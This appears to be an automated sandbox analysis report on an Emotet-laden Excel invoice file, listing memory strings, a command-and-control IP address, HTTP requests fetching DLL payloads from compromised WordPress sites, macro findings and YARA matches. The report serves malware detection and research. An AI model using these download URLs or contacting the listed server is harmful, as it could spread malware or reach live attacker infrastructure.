                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/C01-
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/l
                      Source: regsvr32.exe, 00000004.00000003.1001613039.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1240840830.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/H
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/L
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lJWa95VlQ[1]Jump to behavior
                      Source: unknownDNS traffic detected: queries for: vipteck.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: airliftlimo.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salledemode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kabeonet.plConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.kabeonet.plConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49174 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Found malicious Excel 4.0 Macro
                      Source: Rechnung.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: Rechnung.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: Rechnung.xlsInitial sample: EXEC
                      Source: Rechnung.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ITAzDMJQNXvQb\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_001400003_2_00140000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C743_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE83_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800201183_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C3_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C3_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196283_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A4C3_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800094083_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C143_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064143_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C3_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8343_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C3_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800214443_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800120443_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160543_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C3_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018703_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F8783_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800144843_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154943_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC983_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C3_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A43_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A83_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC3_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B03_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB43_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B43_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C03_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C03_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C83_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D43_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D83_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F03_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125003_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800241043_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C3_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D103_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A5243_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D283_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E1303_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800291343_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800081343_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800221403_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800069543_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F5543_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B5643_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121683_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135683_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800245703_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800191783_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800251803_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800019803_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215883_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A9883_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181903_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800139943_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800289983_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A03_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A63_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA83_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC3_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B43_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B83_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B83_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC3_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C03_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C83_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC3_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D43_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D83_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E03_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC3_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800236243_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800186283_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C3_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176383_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C3_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E403_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A643_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800152643_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C3_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076783_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C3_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126803_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E883_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C3_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800222903_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A903_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C3_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA03_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC3_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB43_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC3_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C03_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC83_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC3_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC3_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC3_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F43_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF43_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF43_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC3_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063083_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C3_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B183_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F243_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B243_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F3283_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217383_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF383_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283483_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C3_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F503_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B3503_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A7583_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C3_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243703_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083703_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157743_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800123783_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B983_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C3_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA03_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A43_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC3_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B03_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB83_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC3_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC03_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC3_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC3_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D00004_2_002D0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C8194_2_000000018000C819
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800196284_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C4_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C4_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800128644_2_0000000180012864
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C744_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B04_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800090B44_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C04_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C04_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800241044_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B244_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A7584_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800245704_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C4_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A44_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC4_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800094084_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C144_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064144_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800236244_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800186284_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C4_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C4_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B8344_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800176384_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C4_2_000000018000403C
